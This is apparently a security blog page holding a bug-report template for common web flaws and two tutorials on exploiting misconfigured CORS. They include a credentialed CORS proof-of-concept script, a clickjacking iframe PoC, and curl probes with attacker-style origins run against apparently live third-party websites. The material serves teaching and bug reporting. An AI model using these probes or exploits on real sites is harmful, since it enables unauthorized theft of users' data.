-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label CORS Bug Hunting. Show all posts
Showing posts with label CORS Bug Hunting. Show all posts
  • What bug you want to Report

     

    What bug you want to Report


     

     

    What bug you want to Report?

     

    A bug report contains device logs, stack traces, and other diagnostic information to help you find and fix bugs in your app.



    Authentication Bypass


    Authentication Bypass is a dangerous vulnerability which is found in Web-Applications. Attackers can bypass the control mechanisms which are used by the underlying web application like OTP, Captcha, 2FA, Email verification etc.
    An Attacker can perform a  complete Account takeover of Victim.


    Severity :   High 

    Complexity : Easy

    From : Remote / External




    Impact : An Adversary can carry out Auth Bypass attack and perform an Account Take Over



    Affected IP's : IP Address     Port
    https://www.example.com/      443



    Recommendations :

    The application should protect the sensitive actions and validate the verification process of the web application. Restrict the user for any malicious behaviour.
     
     
     
    References :


    https://hackerone.com/reports/770504
    https://hackerone.com/reports/257305
    https://hackerone.com/reports/219205

     

     


    No Rate Limit 


    No Rate Limit is a type of computer security vulnerability typically found in web applications. No Rate Limit  enables attackers to perform actions on the web application where the attacker can do signup creation, password reset or 2FA of other users. No Rate Limit vulnerability may be used by attackers to bypass access controls such & bruteforce tokens and passwords without any limiting of any requests. There should be protection on the web application for sensitive actions. Attackers send a high number of requests to perform desirable actions to get access to the application or accounts. 


    NO RL effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.





    Severity :   High 

    POST Request :

    Complexity : Easy

    From : Remote / External



    Impact :An Adversary can carry out No Rate-Limit attack and also can take over the victim Account.
    Also, an adversary can manage to login through any other user's account.


    Affected IP's : IP Address    Port
    https://www.example.com/    443




    Recommendations :

    There should be a protection on the web application for limiting the users simultaneous requests.


    Any user should be Rate limited if He/She sends or races high amount of requests in a significant amount of time.
     
     
     
    References :

    https://hackerone.com/reports/743545
    https://hackerone.com/reports/385381
    https://hackerone.com/reports/297359




    Cross Site Scripting (XSS) :


    Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user̢۪s browser has no way to know that the script should not be trusted and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: Types of Cross-Site Scripting.




    Severity :  High 

    Payload : Enter the payload here

    Complexity : Easy

    From : Remote / External




    Impact : An Adversary can carry out XSS attack and also can take the cookie of the Admin and login through Admin Account.
    Also, an adversary can manage to login through any other users account with valid session cookies.

    Affected IP's : IP Address    Port
    https://www.example.com/    443






    Recommendations :

    Sanitize all the user inputs before executing them, also add XSS protection headers on server and client side.
     
     

    References :


    https://www.acunetix.com/websitesecurity/cross-site-scripting/
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
    https://portswigger.net/web-security/cross-site-scripting

     

     

     

     


    Provided by HACKING TRUTH (CLICK HERE)






    CSRF


    Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.



    Severity :   High 

    POST Request :

    Complexity : Easy

    From : Remote / External




    Steps to Reproduce:



    1. Victim login their example account first.
    2. Attacker send a form/link to victim.
    3. If victim click the form/link, A desirable action could happen (eg- Profile Details Update or Email Password)
    4. Attacker successfully performs ATO





    Impact : An Adversary can carry out CSRF attack to modify the details of a victim and also can take over the victim Account.

    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443





    Recommendations :

    This CSRF protection protects the form against Cross-site Request Forgery attacks because an attacker would also need to guess the token to successfully trick a victim into sending a valid request. The token should also be invalidated after some time and after the user logs out.

     
     
     
     
    References :


    https://owasp.org/www-community/attacks/csrf
    https://www.acunetix.com/websitesecurity/csrf-attacks/
    https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/






    CORS


    Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain. However, it also provides potential for cross-domain based attacks, if a website's CORS policy is poorly configured and implemented. CORS can be exploited to trust any arbitrary domain attacker controlled domain name and send the data to it.  Attackers can make an exploit and ask the domain to send data of the victim to the attacker domain.




    Severity :  High 

    CURL Request : curl “https://example.com/wp-json” -I -H Origin:hackingtruth.in
    As you can see when we run the above request in curl we can see these header results in the response.  



    Access-Control-Allow-Origin: hackingtruth
    Access-Control-Allow-Credentials : true

    Complexity : Easy

    From : Remote / External





    Steps to Reproduce:

    1. Enter the domain name example.com in the POC Code shown below and save it as exploit.html and click on exploit button :



    Exploit Code :

      
      
      
    <html>
    <body>
    <center>
    <h2>CORS POC Exploit>/h2>
    <h3>Extract SID</h3>
    
    <div id="demo">
    <button onclick="cors()" type="button">Exploit Click here
    </button></div>
    
    <script>
    function cors() {
    var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
    document.getElementById("demo").innerHTML = alert(this.responseText);
    }
    };
    xhttp.open("GET", "https://example.com/wp-json/", true);
    xhttp.withCredentials = true;
    xhttp.send();
    }
    </script>
    
    </body>
    </html>
    
      







    Impact : An Adversary can carry out CORS attack to exfiltrate the sensitive details of a victim



    Affected IP's :

    IP Address            Port
    https://www.example/    443




    Recommendations :

    All the REST Apis should be authenticated and the domain should not trust any other domains. Allow only selected, trusted domains in the Access-Control-Allow-Origin header.
     
     
     
    References :

    https://owasp.org/www-community/attacks/CORS_OriginHeaderScrutiny
    https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
    https://en.wikipedia.org/wiki/Cross-origin_resource_sharing
    https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS








    Provided by HACKING TRUTH (CLICK HERE)




    SSRF

     

    Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
    In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems



    Severity :   High 

    POST Request :

    Complexity : Easy

    From : Remote / External





    Steps to Reproduce:

    1. Attacker finds the vulnerable injection point (parameter)
    2. Attacker sends a localhost request or request to his controlled domain (eg: Burp collaborator)
    3. Attacker is able to scan the internal network or connect to localhost. Also attacker can get a HTTP connection on his controlled domain.
    4. Attacker successfully performs SSRF and exfiltrates data if any.




    Impact : An Adversary can carry out SSRF attack to scan the internal network, perform sensitive actions, download sensitive files like meta-data etc.


    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443




    Recommendations :

    There should be a proper validation and sanitization of any URL's,IP or shortlinks given by the user. More here - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
     
     
     
    References :

    https://portswigger.net/web-security/ssrf
    https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/







    Provided by HACKING TRUTH (CLICK HERE)


     

     

     

    SQL Injection


    SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.





    Severity :   High 

    POST Request :

    Complexity
    : Easy

    From : Remote / External




    Steps to Reproduce:

    1. Attacker finds the vulnerable injection point (parameter)
    2. Attacker sends a query to retreive the DB Version or DB Name or DB Tables
    3. Attacker is able to perfrom successfull SQLi




    Impact : An Adversary can carry out SQLi attack to download database,usernames,passwords modify the logic or  perform sensitive actions etc.


    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443



    Recommendations :

    Most instances of SQL injection can be prevented by using parameterized queries (also known as prepared statements) instead of string concatenation within the query.


    References :

    https://portswigger.net/web-security/sql-injection
    https://www.acunetix.com/vulnerabilities/web/sql-injection/






    Provided by HACKING TRUTH (CLICK HERE)


     

     

    Broken Link Hijacking


    When an web application has any pages, sources, links to external 3rd party services and are broken then the attacker can claim those endpoints to successfully conduct the attack and claim those endpoints on behalf of the target website and impersonate his identity.




    Severity :   Medium 

    POST Request :

    Complexity : Easy

    From : Remote / External





    Steps to Reproduce:

    1. Attacker finds the vulnerable injection point (broken link)
    2. Attacker is able to claim the broken link
    3. Attacker is succesfully perfrom the BLH Attack





    Impact : An Adversary can carry out BLH attack to trick the victim in clicking the link and visiting the resources which are linked to the website, this way attacker can perfrom identify theft and steal credentials.


    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443




    Recommendations :

    Fix all the broken links in the web application to any external resources.



    References :

    https://medium.com/@iamtess5277/what-is-broken-link-hijacking-o-o-872d821da6fd
    https://medium.com/@arbazhussain/broken-link-hijacking-burp-plugin-6918d922c3fb
    https://hackerone.com/reports/266908






    Click Jacking


    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.



    Severity :   High 

    POST Request :

    Complexity : Easy

    From : Remote / External





    Steps to Reproduce:


    1. Attacker finds the web application is vulnerable to Clickjacking and loads successfully into the iframe of the attacker.
    2. Attacker creates a POC with the target.com which loads in the iframe
    3. Attacker creates or induces a sensitive action
    4. Attacker is able to achieve sesntive action on the targt.com





    Impact : Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.

    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443



    Recommendations :

    https://portswigger.net/web-security/clickjacking


    References :

    https://portswigger.net/web-security/clickjacking





    Proof of Concept :


       

     <head>
    
                  <style>
    
                       #target_website {
    
                                position:relative;
    
                             width:128px;
    
                             height:128px;
    
                             opacity:0.00001;
    
                             z-index:2;
    
                             }
    
                       #decoy_website {
    
                             position:absolute;
    
                             width:300px;
    
                             height:400px;
    
                             z-index:1;
    
                             }
    
                 </style>
    
                </head>
    
                   ...
    
                <body>
    
                    <div id="decoy_website">
    
                     ...decoy web content here...
    
                     </div>
    
                     <iframe id="target_website" src="https://vulnerable-website.com">
    
                     </iframe>
    
                </body>
      
      
      










    Subdomain Takeover


    A Subdomain Takeover is defined as Subdomain takeover attacks are a class of security issues where an attacker is able to seize control of an organization̢۪s subdomain via cloud services like AWS or Azure



    Severity :   High 

    POST Request :

    Complexity : Easy

    From : Remote / External




    Steps to Reproduce:


    1. Attacker finds the vulnerable subdomain (DANGLING DNS RECORD)
    2. Attacker is able to claim the subdomain on the cloud service
    3. Attacker is succesfully perfrom the Subdomain Takeover Attack





    Impact : An Adversary can carry out Subdomain Takeover attack to claim the unclaimed subdomains from the target website and host malicious content on the claimed subdomains.
    He can also perform Identity thefts by hosting malicious login pages etc..

    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443




    Recommendations :

    Fix all the broken links in the web application to any external resources.

    References :

    https://medium.com/@friendly_/subdomain-takeover-awarded-200-8296f4abe1b0
    https://safaras.medium.com/find-your-first-bug-1-subdomain-takeover-8c7e6192220f




     



    HTML Injection


    When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.




    Severity :   Medium 

    POST Request :

    Complexity : Easy

    From : Remote / External




    Steps to Reproduce:

    1. Attacker finds the vulnerable injection point (parameter)
    2. Attacker is able to inject the HTML Tags and it gets executed
    3. Attacker is able to perfrom successfull HTML Injection




    Impact : An Adversary can carry out HMTLi attack to trick the victim in clicking the link and visiting the website, this way attacker can perfrom identify theft and steal credentials.

    Affected IP's : IP Address    Port
    https://www.india.gov.in/    443





    Recommendations :

    Do not allow parsing or execution of HTML tags from the user input.


    References :

    https://www.acunetix.com/vulnerabilities/web/html-injection/#:~:text=HTML%20Injection%20is%20an%20attack,injection%20of%20certain%20HTML%20tags.
    https://www.softwaretestinghelp.com/html-injection-tutorial/








    File Inclusion


    An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.



    Severity :   High 

    Complexity : Easy

    From : Remote / External



    Steps to Reproduce:


    1. Attacker identfies a vulnerable injection point (parameter)
    2. Attacker tries to read and execute the internal file
    3. Attacker is successfully able to perfrom File Inclusion Attack




    Impact : An Adversary can carry out Directory Listing to gain sensitive information from the target server


    Affected IP's : IP Address     Port
    https://www.example.com/      443



    Recommendations :

    The application should have proper whitelist of files and ignore every other filename and path.

     
    References :

    https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/









    Directory Listing


    Directory Listing is a vulnerabilty in which the server has misconfiguration and exposes the internal and hidden directories from the server to the public internet.
    Sometime an attacker can gain sensitive information from the server like backup files, source code , api keys , password files etc.



    Severity :   Medium 

    Complexity : Easy

    From : Remote / External





    Impact : An Adversary can carry out Directory Listing to gain sensitive information from the target server

    Affected IP's : IP Address     Port
    https://www.example.com/      443


    Recommendations :

    The application should have proper permissions on sensitive directories and content.
     
     
    References :

    https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/#:~:text=Directory%20listing%20is%20a%20web,it%20leads%20to%20information%20disclosure.



     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


     

  • Exploitation of CORS Prefix-Suffix Match

     

    Exploitation of CORS Prefix-Suffix Match

     

     

    In this blog we are going to see exploitation of CORS using prefix patch time.

     

    What is CORS? 

     

    Cross-Origin Resource Sharing

    W3C working draft that defines how the browser and server must communicate when accessing sources across origins. CORS Cross Origin Resource Sharing Vulnerability on Live Website

    Implemented via HTTP headers that servers set and browsers enforce.

     


    Prefix Time


    So the target URL is on hakonindia.org and here in we are going to add evil.com at the end of this website so this attack that is known as prefix match exploitation of CORS.

    So here in while testing, I noticed that whenever I try to supply any arbitary origin and have "hakonindia", it does not take it, so if I type origin attacker.com and send it it does not take it why because the website developer has kept a condition at in origin "hakonindia" should come so when I tried "evilhakonindia.org" it did not allow me so basically the condition is like that that anything you cannot be added before the hostname for the website name if i do any modifications before the hostname that is "hakonindia.org" it does not take that and just block set but then I tried this condition in which I added the attacker.com or evil.com at the end and I was able to successfully achieved cause onto this website as this court deflected into the response as it is so what does this mean any attacker can purchase this website which is evil.com and make a subdomain and again a subdomain of that and do a successful exploitation of CORS on this website.

     



    Here, attacker purchase this domain evil.com and make a subdomain like org.evil.com or hakonindia.org.evil.com


    {
      "url":"http://www.hackonindia.org/wp-json",
      "credentials":"true"
      "type":"prefix_match",
      "origin":"http://www.hackonindia.org.evil.com",
      "status_code":200
    
    } 
    
    





    here i am going to search curl and the target name is "https://www.hakonindia.org/wp-json" and (-I) because i want to see only response header.



      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I 
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Link: ; rel="https://api.w.org/"
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
      




    As you can see i am able to see the reponse header and now i add attacker.com into the origin.



    -H which means header and the header we are going to the gives origin hakonindia.org.evil.com and i will hit enter so as you can see this it is getting reflected as we gave into the request it is getting reflected into the response as it as. So as you can see allow access control origin hakonindia.org.evil.com and in access control allow credentials giving true which means this is the best case we have got, we are able to exploit this.





      
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I -H Origin:hakonindia.org.evil.com
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Access-Control-Allow-Origin: http://hakonindia.org.evil.com
    Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    Access-Control-Allow-Credentials: true
    Vary: Origin, User-Agent
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
      
      



     

    Suffix Time

     

    The type suffix match, so in here as you can the URL and target is this "https:ukrainianpeople.us/wp-json/".


    Now if you look closely in the origin what i am going to supply is "evilukrainianpeople.us" because guys some websites for block trusting arbitrary attackers website that is evil.com. How do they do it basically the developer put the logic that any origin which is coming any request which is coming with any origin to the server should contain the hostname which is the the host wesbites name is "ukrainianpeople" but it does not check if the attacker is adding something into the suffix with the host name of the website and sending something so as you can see here you are able to bypass this condition on the website where the website was checking that ukrainianpeople should come into the origin by adding evil with that now when will send this evilukrainianeople.us that us the website is going to trust this why it because the condition only checks that ukrainianpeople.us comes into the origin which is satisfied and successfully this will get reflected in the response now the attacker can quickly go and purchase this domain which is evilukrainianpeople.us and then he can to the further cost exploitation attack.



      
      
    {
      "url":"https://ukrainianpeople.us/wp-json",
      "credentials":"true"
      "type":"prefix_match",
      "origin":"https://evilukrainianpeople.us",
      "status_code":200
    
    } 
    
      


      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I                                                                                  1 ⨯
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:19:56 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:19:56 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
    
    
      




    I am going to start with curl and our target is "https://ukrainianpeople.us/wp-json" and (-I) and i want to see only response header. Now as you can see these our headers, they are come from webservers. Now we are add our arbitary origin that is attacker.com and we will make the website trust us. so (-H) means headers. The headers name is origin and trust "evilukrainianpeople.us".




      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I -H Origin:evilukrainianpeople.us        
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:20:54 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,Origin,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    access-control-allow-origin: http://evilukrainianpeople.us
    access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    access-control-allow-credentials: true
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:20:54 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
      




    And as you can access-control-allow-origin and our origin has reflected and the credentails are also true. 






    Brought to you by Hacking Truth


     

     

    CORS Mitigation


    1) SOP! Same Origin Policy
    2) Do not trust any aribitary origin and communication with it!




    what are the mitigations for CORS.

    1) So the first and the best mitigations for CORS is SOP the same origin policy. so this policy means this policy means that the web site or the web application should not transfer any kind of data to any other web application so it should only communicate and transfer the data with the same origin for same website.


    2) Do not trust any arbitrary origin and communicate with that if any web application is getting any origin header as a request that should not trust that arbitrary header and give out sensitive information basically whenever attacker tries to do a reflective origin based CORS the server should discard that I should not trusted and should not give out the response to that server. Secondly if a suffix or prefix based cause exploitation is performed the server should do proper validation not just limited to checking the hostname into the origin we have already seen if the server is misconfigured and just check for the name into the origin header and takes decisions based on that which is dangerous can lead to CORS exploitation. So do not trust any arbitrary origin and communicate with it is the best mitigation for CORS. so I hope you understood the mitigation for CORS.




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • CORS Cross Origin Resource Sharing Vulnerability on Live Website

     

     

    CORS Cross Origin Resource Sharing Vulnerability

     

     

    What is CORS? 


    Cross-Origin Resource Sharing

    W3C working draft that defines how the browser and server must communicate when accessing sources across origins. CORS Cross Origin Resource Sharing Vulnerability on Live Website

    Implemented via HTTP headers that servers set and browsers enforce.

     

    Can be categoriezed into 

     
     - Simple Requests
     - Requests that need a Prelight
     


    Working Process



    https://www.hackingtruth.in
    credit for this image hacktify



    Three Important Cases for CORS

     

    We are going to see important cases for identify a CORS vulnerability. This is the best which is the best case for this vulnerability.




    https://www.hackingtruth.in

     

     

     

    As you can see under the left side it is the request and right side it is the response if we try to add our header into the request and header is origin And let say we type any.com which is attacker.com and if this attacker.com get reflected into the response in this two headers. Access-Control-Allow-Origin attacker.com and Access-Control-Allow-Credentials true then this is vulnerable which is the best test best case for us.

    so we have understood the first and the best test case is that whenever we try to supply attacker.com into the origin into the request if we get the attackr.com as it is into the response then it is the best test case for the attacks.

    So now let's see the second best test case for for our exploitation.In the request it is attacker.com. In the origin header and in the response if it shows something like null in Access-Control-Allow-Origin and Access-Control-Allow-Credentials if we seen True then also it is the best test case for our attack. So I hope you guys understood the first and second test case.

     
    In the first test case we got attacker.com as it is by passing it in the request we got as into the request and in the second test case we passed at the attacker.com and in the response Null. Which also means it is exploitable. 

     



    CORS Cross Origin Resource Sharing Vulnerability



    CORS Cross Origin Resource Sharing Vulnerability on live website


                   
                                                    

    So, let's see the last test case which is the case 3 which is a bad implementation but not exploitable test case we cannot exploit this test case. so, in the request if attacker.com is passed into a header that is origin and in the response if we get * (star) in access-control-allow-origin if we get a * (star) then it is not exploitable this test case is not exploitable. we cannot exploit this so to conclude the first to test cases we can exploit in which we are able to see a reflection of the origin into the response that is a attacker.com that is the first test case in the second test case if you are able to see Null then it is also exploitable but if you're getting a * (star) into the response it is not acceptable I hope you guys understood this and now it is the practical time let see the practical for this.



    Practical


    I will get a request into my burp suite after getting the request i am going to this request to the repeater so that i can use this request again and again. Now in near what i am doing to do is!! I am going to add a new header and header is Origin as we saw into our test cases. after adding here Origin: https://hackingtruth.in and i am going hit go.









    If you look closely in the response tab there is something which is generated, here is link and the link which is i am getting one more End-point zinghr.com (/wp-json/).


    What if try to send a request to add this point GET /wp-json/ HTTP/1.1 with these Origin.










    So this time when i did go. Vola!! as you can see this time the zinghr.com server has trusted this attacker server that is hackingtruth.in and is ready to exchange the data between in the server. So this website is vulnerable with CORS.



    Access-Control-Allow-Origin: https://hackingtruth.in
    Access-control-allow-origin: True

     
    which is reflected.




    Manually


    Lets do this how to manualy exploit this issue with curl command and those who don't know what is curl basically curl is a simple utility which is responsible to sending the request to any target and getting a response.


    curl "https://zinghr.com/wp-json/" -I 

     

    -I - For header that i only want to see response header instead of whole page source. There is something which is generated, here is link and the link which is i am getting one more End-point zinghr.com (/wp-json/)





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://zinghr.com/wp-json/" -I                     
    HTTP/2 200 
    date: Sun, 04 Jul 2021 19:13:49 GMT
    server: Apache
    x-powered-by: PHP/7.3.26
    x-robots-tag: noindex
    link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
    access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
    allow: GET
    vary: User-Agent
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    



     

    link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"

     

    So, now we add a new header called origin and now i am going to hit enter and check for verify this origin is trusted by zinghr.com server or not? But if this is trusted then it back reflected into the response header.


    curl "https://zinghr.com/wp-json/" -I -H Origin: https://hackingtruth.in




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://zinghr.com/wp-json/" -I -H Origin:https://hackingtruth.in
    HTTP/2 200 
    date: Sun, 04 Jul 2021 19:19:44 GMT
    server: Apache
    x-powered-by: PHP/7.3.26
    x-robots-tag: noindex
    link: <https://www.zinghr.com/wp-json/>; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
    access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
    allow: GET
    access-control-allow-origin: https://hackingtruth.in
    access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    access-control-allow-credentials: true
    vary: Origin,User-Agent
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    



     

    Access-Control-Allow-Origin: https://hackingtruth.in
    Access-control-allow-origin: True

     
    which is reflected.


    As you can see our best test case that is the first test case is been satisfied over here and we are able to get our attacker.com reflected into the response. so i hope you guys understood. How to find this vulnerability using burp suite as well as curl.





    Provided by HackerOne CORS Report





    CORS Mitigation


    1) SOP! Same Origin Policy
    2) Do not trust any aribitary origin and communication with it!




    what are the mitigations for CORS.

    1) So the first and the best mitigations for CORS is SOP the same origin policy. so this policy means this policy means that the web site or the web application should not transfer any kind of data to any other web application so it should only communicate and transfer the data with the same origin for same website.


    2) Do not trust any arbitrary origin and communicate with that if any web application is getting any origin header as a request that should not trust that arbitrary header and give out sensitive information basically whenever attacker tries to do a reflective origin based CORS the server should discard that I should not trusted and should not give out the response to that server. Secondly if a suffix or prefix based cause exploitation is performed the server should do proper validation not just limited to checking the hostname into the origin we have already seen if the server is misconfigured and just check for the name into the origin header and takes decisions based on that which is dangerous can lead to CORS exploitation. So do not trust any arbitrary origin and communicate with it is the best mitigation for CORS. so I hope you understood the mitigation for CORS.





    Provided by HackerOne CORS Report



     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

